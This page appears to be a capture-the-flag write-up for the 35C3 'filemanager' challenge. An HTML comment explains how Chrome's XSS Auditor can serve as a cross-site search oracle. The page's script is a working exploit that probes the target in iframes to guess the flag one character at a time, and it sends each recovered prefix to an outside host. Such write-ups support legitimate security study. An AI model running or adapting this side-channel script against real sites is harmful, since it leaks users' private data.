<body>
<!--
Briefly, we all know that the flag is stored as `file` in the admin account. Plus, the flag is in the format: 35C3_***
When we search the content of a file, if the word exists, there is a script which highlights the found word in yellow with a `<mark>` tag.
For example: https://filemanager.appspot.com/search?q=def
<h1>abc</h1>
<pre>def</pre>
<script>
  (()=>{
    for (let pre of document.getElementsByTagName('pre')) {
      let text = pre.innerHTML;
      let q = 'def';
      let idx = text.indexOf(q);
      pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
    }
  })();
</script>
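The highlighter above searches the element's serialized HTML and splices raw `<mark>` tags into it, so a query can match inside an entity (`amp` in `&amp;`) or a tag and the query itself is written back unescaped. As an added example (not code from the gist or the challenge), a highlighter that works on the element's text and escapes every fragment before it is reassembled; `escapeHtml`, `highlightHtml` and `highlightPre` are names chosen here:

```javascript
// Added example, not part of the original gist: escape text for safe insertion into HTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Build the HTML for `text` with every occurrence of `q` wrapped in <mark>.
// Searching happens on plain text, so a query can never match inside an entity
// or a tag, and both the surrounding text and the query are escaped.
function highlightHtml(text, q) {
  if (!q) return escapeHtml(text);
  const parts = [];
  let start = 0;
  for (;;) {
    const idx = text.indexOf(q, start);
    if (idx === -1) break;
    parts.push(escapeHtml(text.slice(start, idx)), '<mark>', escapeHtml(q), '</mark>');
    start = idx + q.length;
  }
  parts.push(escapeHtml(text.slice(start)));
  return parts.join('');
}

// Browser usage: read textContent (decoded text), never innerHTML, before searching.
function highlightPre(pre, q) {
  pre.innerHTML = highlightHtml(pre.textContent, q);
}
```

Serving `X-XSS-Protection: 0` removes the auditor block that the rest of this writeup relies on, and Chrome dropped the XSS Auditor entirely in version 78.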
Okay, now let's go to the XSS Auditor part.
Try this on Chrome (yes, we should, since the description says that the admin is using headless Chrome):
view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b
You can see the red alert, which means that the XSS Auditor found an XSS vector in our URL (the `a` param) that also shows up in the page's content. But in fact, it's *NOT XSS*; this is a side effect of the auditor.
We leverage this mechanism to detect whether there is a search result (guessing the flag) or not.
* To clarify: `a` is just a dummy parameter name; we just want the XSS Auditor to see it as an XSS vector.
But how do we do that? Since the XSS Auditor will detect and block the page, it redirects the page to `chrome-error://chromewebdata/` as well.
Now the trick comes in. By reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
I found out it's possible to detect if the browser redirects to another page.
Yep, and that's all.
We can guess the flag by performing XS-Search leveraging the XSS Auditor.
-->
<script>
  var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
  var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';
  // Prefix guessed so far; carried over between runs via the `brute` query parameter.
  var brute = new URLSearchParams(location.search).get('brute') || '35C3_';
  function guess(i){
    var go = brute + charset[i];
    var x = document.createElement('iframe');
    x.name = 'blah';
    var calls = 0;
    x.onload = () => {
      calls++;
      if(calls > 1){
        // A second onload means the XSS Auditor blocked the page and the frame
        // was redirected to chrome-error://, so this character is a hit.
        // https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
        console.log("GOT IT ==> ", go);
        location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go);
        x.onload = ()=>{};
      }
      // Re-navigate the frame to its own URL plus a fragment (the redirect-detection trick from the post above).
      var anchor = document.createElement('a');
      anchor.target = x.name;
      anchor.href = x.src+'#';
      anchor.click();
      anchor = null;
    }
    x.src = URL.replace('{{search}}',go);
    document.body.appendChild(x);
    // Give the frame a second, then move on to the next candidate character.
    setTimeout(() =>{
      document.body.removeChild(x);
      guess(i+1);
    },1000);
  }
  guess(0);
  // FLAG: 35C3_xss_auditor_for_the_win
</script>
</body>
Hic! Pro, could you explain it in more detail?? :)) Hoping to be enlightened :v